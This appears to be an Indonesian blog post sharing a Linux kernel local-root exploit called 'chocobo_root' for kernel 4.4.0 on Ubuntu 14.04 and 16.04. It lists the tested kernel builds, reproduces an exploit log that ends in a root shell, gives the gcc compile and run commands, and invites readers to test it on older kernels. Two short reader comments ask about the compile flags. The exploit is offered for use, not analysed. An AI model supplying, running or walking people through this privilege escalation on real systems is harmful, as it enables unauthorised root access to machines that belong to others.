Yo, Kali ini cuma mau share localroot yang barusaja dipublish beberapa hari yang lalu. Localroot ini menyerang kernel 4.4.0 yang berarti vuln di Ubuntu 14.04 dan Ubuntu 16.04.
Kernel yang sudah di test :
- Ubuntu 16.04: 4.4.0-51-generic
- Ubuntu 16.04: 4.4.0-47-generic
- Ubuntu 16.04: 4.4.0-36-generic
- Ubuntu 14.04: 4.4.0-47-generic #68~14.04.1-Ubuntu
Kemungkinan localroot ini juga berlaku untuk mendapatkan hak akses root di kernel yang lebih tua dari 4.4.0 . Jadi silahkan di test sendiri saja.
Log :
retrying stage..
new exploit attempt starting, jumping to 0xffffffff812879a0, arg=0xffffffffff600850
sockets allocated
removing barrier and spraying..
version switcher stopping, x = -1 (y = 133577, last val = 2)
current packet version = 0
pbd->hdr.bh1.offset_to_first_pkt = 48
*=*=*=* TPACKET_V1 && offset_to_first_pkt != 0, race won *=*=*=*
please wait up to a few minutes for timer to be executed. if you ctrl-c now the kernel will hang. so don’t do that.
closing socket and verifying…….
sysctl added!stage 2 completed
binary executed by kernel, launching rootshell
root@ubuntu:~# id
uid=0(root) gid=0(root) groups=0(root),1000(user)
Cara compile :
gcc chocobo_root.c -o chocobo_root -lpthread
./chocobo_root
Oke sekian artikel kali ini, see you next time.
maaf bang , penjelasan dari
*gcc
*chocobo_root.c
*-o
*chocobo_root
*-lpthread
itu sendiri apa ya? kok disetiap xploit waktu compile beda beda
ya kan tergantung nam file yg dikompile. dan modul apa yang ingin dikompile